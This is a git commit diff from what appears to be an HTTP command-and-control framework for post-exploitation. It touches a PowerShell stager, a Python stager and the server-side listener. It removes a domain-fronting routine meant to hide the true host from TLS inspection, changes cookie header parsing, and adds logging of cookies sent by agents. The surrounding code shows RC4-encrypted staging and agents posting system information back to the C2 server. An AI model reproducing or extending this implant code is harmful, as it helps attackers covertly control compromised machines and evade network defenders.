Fixed python and powershell stager cookie handling logic. Added additional output for POST requests

2018-06-05 10:39:51 -04:00 · 2018-06-05 10:39:51 -04:00 · d56628718f
parent f9018fc637
commit d56628718f
3 changed files with 28 additions and 21 deletions
--- a/data/agent/stagers/http.ps1
+++ b/data/agent/stagers/http.ps1
@ -211,21 +211,7 @@ function Start-Negotiate {
    $rc4p2 = ConvertTo-RC4ByteStream -RCK $($IV2+$SKB) -In $data2;
    $rc4p2 = $IV2 + $rc4p2 + $eb2;

-    # the User-Agent always resets for multiple calls...silly
-    if ($customHeaders -ne "") {
-        $headers = $customHeaders -split ',';
-        $headers | ForEach-Object {
-            $headerKey = $_.split(':')[0];
-            $headerValue = $_.split(':')[1];
-            #If host header defined, assume domain fronting is in use and add a call to the base URL first
-            #this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
-            if ($headerKey -eq "host"){
-                try{$ig=$WC.DownloadData($s)}catch{};
-            }
-
-            $wc.Headers.Add($headerKey, $headerValue);
-        }
-    }
+    # UA resets for every call with net.webclient
    $wc.Headers.Add("User-Agent",$UA);

    # step 5 of negotiation -> client posts nonce+sysinfo and requests agent
--- a/data/agent/stagers/http.py
+++ b/data/agent/stagers/http.py
@ -48,12 +48,9 @@ for headerRaw in headersRaw:
    try:
        headerKey = headerRaw.split(":")[0]
        headerValue = headerRaw.split(":")[1]
-        if headerKey.lower() == "cookie":
-            headers['Cookie'] = "%s;%s" % (headers['Cookie'], headerValue)
-        else:
-            headers[headerKey] = headerValue
-    except:
-        pass
+        headers[headerKey] = headerValue
+    except Exception as e:
+        print e

 # stage 3 of negotiation -> client generates DH key, and POSTs HMAC(AESn(PUBc)) back to server
 clientPub = DiffieHellman()
--- a/lib/listeners/http.py
+++ b/lib/listeners/http.py
@ -1128,6 +1128,30 @@ def send_message(packets=None):
            })
            dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))

+            listenerName = self.options['Name']['Value']
+            try:
+                cookie = request.headers.get('Cookie')
+                if cookie and cookie != '':
+
+                    # see if we can extract the 'routing packet' from the specified cookie location
+                    # NOTE: this can be easily moved to a paramter, another cookie value, etc.
+                    
+                    message = "[*] POST cookie value from {} : {}".format(clientIP, cookie)
+                    signal = json.dumps({
+                        'print': False,
+                        'message': message
+                    })
+                    dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
+                
+            except Exception as e:
+                
+                message = "[!] Error retrieving cookie value from {}: {}".format(clientIP, e)
+                signal = json.dumps({
+                    'print': False,
+                    'message': message
+                })
+                dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
+
            # the routing packet should be at the front of the binary request.data
            #   NOTE: this can also go into a cookie/etc.
            dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, requestData, listenerOptions, clientIP)